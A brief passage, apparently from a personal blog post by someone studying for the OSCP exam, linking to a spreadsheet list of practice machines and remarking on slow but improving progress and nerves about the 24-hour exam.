List](https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#) (though it would also scare me a little given how long it took me to get through it...don't fancy knocking five of these out inside of 24-hours for the OSCP 😱...getting better though...slowly.)